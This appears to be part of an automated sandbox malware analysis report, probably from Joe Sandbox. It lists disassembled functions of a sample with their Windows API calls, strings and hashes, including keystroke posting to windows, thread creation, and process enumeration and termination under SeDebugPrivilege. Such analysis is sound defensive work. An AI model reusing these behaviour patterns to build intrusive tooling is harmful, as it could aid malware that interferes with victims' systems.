                                              • Opcode ID: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction ID: a22c4c591f825f0e08fb7b91729bd6dbe52c3bdcd77882b7c8c8402d33ba12e3
                                              • Opcode Fuzzy Hash: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction Fuzzy Hash: 1031B071210B81AFDB21AFB6DC04A67BBF8FF18300B18551EFA9696610D731E856DB70
                                              Function 00DD25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25BD
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DD25DB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DD25DF
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25E9
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DD2601
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DD2605
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD260F
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DD2623
                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DD2627
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction ID: 26efbe28141f02a8d94ea044eb9ebe6a6e94486f0e7089930b88ed6ae1e8cd0d
                                              • Opcode Fuzzy Hash: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction Fuzzy Hash: 4401D830390210BBFB2067699C8AF593F69DB5EB11F200102F354BF1D1C9E354888ABA
                                              Function 00DD1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DD1449,?,?,00000000), ref: 00DD180C
                                              • RtlAllocateHeap.NTDLL(00000000,?,00DD1449), ref: 00DD1813
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1828
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00DD1449,?,?,00000000), ref: 00DD1830
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD1833
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1843
                                              • GetCurrentProcess.KERNEL32(00DD1449,00000000,?,00DD1449,?,?,00000000), ref: 00DD184B
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD184E
                                              • CreateThread.KERNEL32(00000000,00000000,00DD1874,00000000,00000000,00000000), ref: 00DD1868
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                              • String ID:
                                              • API String ID: 1422014791-0
                                              • Opcode ID: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction ID: e5dde93b64b4b8e826c2d50c5a4d3c395c883de92d26488f37c4b137419ff282
                                              • Opcode Fuzzy Hash: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction Fuzzy Hash: FB01BF75241304BFE710AB65DC4DF573B6CEB89B11F104511FA05DB192C6759844CB20
                                              Function 00DFA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DDD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                                • Part of subcall function 00DDD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                                • Part of subcall function 00DDD4DC: CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA16D
                                              • GetLastError.KERNEL32 ref: 00DFA180
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA1B3
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DFA268
                                              • GetLastError.KERNEL32(00000000), ref: 00DFA273
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA2C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 2390fb17140854b3b402e8644febe5acf291db1aef4f94b1dc6653782ecc1f61
                                              • Instruction ID: 24706cb32b6dc040b80108544ca64c3751e4e67f3a4dfe9aeb1103c3ee2f24cd
                                              • Opcode Fuzzy Hash: 2390fb17140854b3b402e8644febe5acf291db1aef4f94b1dc6653782ecc1f61
                                              • Instruction Fuzzy Hash: AF619E70205242AFD710DF19C494F29BBE1AF44318F1AC48CE56A4B7A3D776ED49CBA2
                                              Function 00E03886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E03925
                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E0393A
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E03954
                                              • _wcslen.LIBCMT ref: 00E03999
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E039C6
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E039F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcslen
                                              • String ID: SysListView32
                                              • API String ID: 2147712094-78025650
                                              • Opcode ID: 22f426b125665fc48a74a66eaad88b09ad6136130b0182d6bae698b935e42548
                                              • Instruction ID: db33d3564f4a366a51c5af9fe667f5e7da966d0bfb33200fe7917e8a0943eb53
                                              • Opcode Fuzzy Hash: 22f426b125665fc48a74a66eaad88b09ad6136130b0182d6bae698b935e42548
                                              • Instruction Fuzzy Hash: 0841AF71A00318ABEF219F64CC49BEA7BA9EF48354F101566F958F72C1D7719AC4CBA0
                                              Function 00DDBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DDBCFD
                                              • IsMenu.USER32(00000000), ref: 00DDBD1D
                                              • CreatePopupMenu.USER32 ref: 00DDBD53
                                              • GetMenuItemCount.USER32(00FC5908), ref: 00DDBDA4
                                              • InsertMenuItemW.USER32(00FC5908,?,00000001,00000030), ref: 00DDBDCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                              • String ID: 0$2
                                              • API String ID: 93392585-3793063076
                                              • Opcode ID: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction ID: f0ed79ab7fb9c54dc5a1262ca01ae095afd7e58f72e328e1be7d434367980087
                                              • Opcode Fuzzy Hash: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction Fuzzy Hash: 80519F70600205DBDB10CFA9D884BAEBBF6FF49328F29425BE442A7390E7709945CB71
                                              Function 00DDC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00DDC913
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction ID: bd21fa2dcb1a65d56e20707f37d3beb6556ff5784e5efc18ed90c66dfa1cf4be
                                              • Opcode Fuzzy Hash: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction Fuzzy Hash: 6D113A32699307BBEB019B64DC93CAA279CDF15329F60502BF500B6382E7B1AE01D674
                                              Function 00DDED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$LocalTime
                                              • String ID:
                                              • API String ID: 952045576-0
                                              • Opcode ID: 009eb12e4adeee68fc35b74945adf6dbf872cb354a8bef7bd45ca34180ff0383
                                              • Instruction ID: 47c790d4ef57ae735e4fa2d2a1a9b03ad4ddad53d388717a8a5e57993ef35384
                                              • Opcode Fuzzy Hash: 009eb12e4adeee68fc35b74945adf6dbf872cb354a8bef7bd45ca34180ff0383
                                              • Instruction Fuzzy Hash: 38417C65C102187ACF11EBF4888A9CFB7A9EF45710F508566F518E3222EB34E255C7BA
                                              Function 00D8F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00D8F953
                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF3D1
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF454
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 61857cc5029bc5b747b6337c8d68ecac14d2f65ff9f59ed3d93a628164f5f276
                                              • Instruction ID: fb56c5cba379ca3be7b9d02e3fc738dd526b47ab361c69e703255e80e8845726
                                              • Opcode Fuzzy Hash: 61857cc5029bc5b747b6337c8d68ecac14d2f65ff9f59ed3d93a628164f5f276
                                              • Instruction Fuzzy Hash: 9141E731618680FED739BB2A8888B6E7B92AB56314F1C453DE0C767560D676E8C4CF31
                                              Function 00E02D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00E02D1B
                                              • GetDC.USER32(00000000), ref: 00E02D23
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E02D2E
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E02D3A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E02D76
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E02D87
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E05A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00E02DC2
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E02DE1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: b2fdc62913e7351f8ee010933c644cb90d8b060029cd05de1cd8300dddb52bf5
                                              • Instruction ID: 42066d96a911067367feec885f1ae3d05e1c15f00c30a1068912b699a3258fa6
                                              • Opcode Fuzzy Hash: b2fdc62913e7351f8ee010933c644cb90d8b060029cd05de1cd8300dddb52bf5
                                              • Instruction Fuzzy Hash: B1319A72201214BFEB218F51DC8AFEB3BADEF09715F144155FE08AA2D1C6769C85CBA1
                                              Function 00DD5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 1f5432a89ad283d9a919b9ce78377d6b4cf11d381ffa352e45394cc670b45cb8
                                              • Instruction ID: f3b98352978df7c040303ae0184e760d8a57e00e63fb123d1496313e7adc630a
                                              • Opcode Fuzzy Hash: 1f5432a89ad283d9a919b9ce78377d6b4cf11d381ffa352e45394cc670b45cb8
                                              • Instruction Fuzzy Hash: FD21CC65B44B09B7E7155510AD83FFA736CEF11384F580022FD056AB85F720ED6085B5
                                              Function 00DF4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: f9067fca75f744dd63cabfb502c4fe0e3d0f4dd2362cf0ae65f91b8f59a040d4
                                              • Instruction ID: 284c58e5fdb4974a17b4870942df07dac421e663264eae9b7fc3239cb43d70fe
                                              • Opcode Fuzzy Hash: f9067fca75f744dd63cabfb502c4fe0e3d0f4dd2362cf0ae65f91b8f59a040d4
                                              • Instruction Fuzzy Hash: 0ED19271A0060AAFDF10CF98D880BBEB7B5BF48344F15C169EA15AB285D771DD45CB60
                                              Function 00DB1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(?,?), ref: 00DB15CE
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB1651
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB16E4
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB16FB
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB1777
                                              • __freea.LIBCMT ref: 00DB17A2
                                              • __freea.LIBCMT ref: 00DB17AE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 2829977744-0
                                              • Opcode ID: 4f89775878b2dd043965a0ff3f5671fd9e73642c8fb43467c667ad8d2c944fd8
                                              • Instruction ID: 7ab1db5b8039d0e7c08b43bb2a7f396544eca64b2f1f4387145ca098d1554233
                                              • Opcode Fuzzy Hash: 4f89775878b2dd043965a0ff3f5671fd9e73642c8fb43467c667ad8d2c944fd8
                                              • Instruction Fuzzy Hash: 5891A379E10216DADB208E64C8A1AEE7BF5DF49710F984659E803E7141DB25DD44CB70
                                              Function 00DF4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2610073882-625585964
                                              • Opcode ID: e38392094ac27e1798b9943afd91231e70c95bef710ce428508385e4c6771365
                                              • Instruction ID: af5a738c8dae89ab6d4da12c27373c5a3afaddcbc20db223617569075b36968b
                                              • Opcode Fuzzy Hash: e38392094ac27e1798b9943afd91231e70c95bef710ce428508385e4c6771365
                                              • Instruction Fuzzy Hash: DA918B71A00219ABDF20DFA5C888FAFBBB8EF46714F158559F605AB280D7709945CFB0
                                              Function 00DE1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DE125C
                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DE1284
                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DE12A8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE12D8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE135F
